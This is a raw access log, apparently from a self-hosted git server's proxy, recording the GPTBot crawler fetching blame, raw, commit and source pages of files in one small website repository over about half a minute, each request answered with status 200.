"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" +[17/Feb/2026:13:05:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 10829] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" +[17/Feb/2026:13:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" [Client 74.7.227.38] [Length 351] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.tsx" +[17/Feb/2026:13:05:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 11188] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" +[17/Feb/2026:13:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 11211] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" +[17/Feb/2026:13:05:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 10354] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" +[17/Feb/2026:13:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 11484] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:13:05:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" +[17/Feb/2026:13:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" +[17/Feb/2026:13:05:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" +[17/Feb/2026:13:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 10955] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" +[17/Feb/2026:13:05:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:13:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/tsconfig.json" +[17/Feb/2026:13:05:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/metadata.json" +[17/Feb/2026:13:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" [Client 74.7.227.38] [Length 10312] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:13:05:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/vite.config.ts" +[17/Feb/2026:13:05:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" +[17/Feb/2026:13:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 11046] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:13:05:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 26317] [Gzip 11.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:13:05:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 10312] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" +[17/Feb/2026:13:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146688] [Gzip 20.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" +[17/Feb/2026:13:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" +[17/Feb/2026:13:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" +[17/Feb/2026:13:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" +[17/Feb/2026:13:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 11849] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" +[17/Feb/2026:13:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" +[17/Feb/2026:13:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" +[17/Feb/2026:13:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 10120] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" +[17/Feb/2026:13:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 10856] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" +[17/Feb/2026:13:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 10341] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" +[17/Feb/2026:13:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" +[17/Feb/2026:13:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 41655] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" +[17/Feb/2026:13:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 16735] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" +[17/Feb/2026:13:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 11855] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 10346] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" +[17/Feb/2026:13:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" +[17/Feb/2026:13:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 11184] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" +[17/Feb/2026:13:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 10351] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" +[17/Feb/2026:13:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" +[17/Feb/2026:13:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" +[17/Feb/2026:13:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" +[17/Feb/2026:13:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 11269] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" +[17/Feb/2026:13:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" +[17/Feb/2026:13:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" +[17/Feb/2026:13:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" +[17/Feb/2026:13:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" +[17/Feb/2026:13:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 11186] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" +[17/Feb/2026:13:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" +[17/Feb/2026:13:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 11260] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 11666] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 11846] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" +[17/Feb/2026:13:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" +[17/Feb/2026:13:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 10354] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" +[17/Feb/2026:13:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" +[17/Feb/2026:13:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 74.7.227.38] [Length 14601] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:13:06:09 +0000] - 200 200 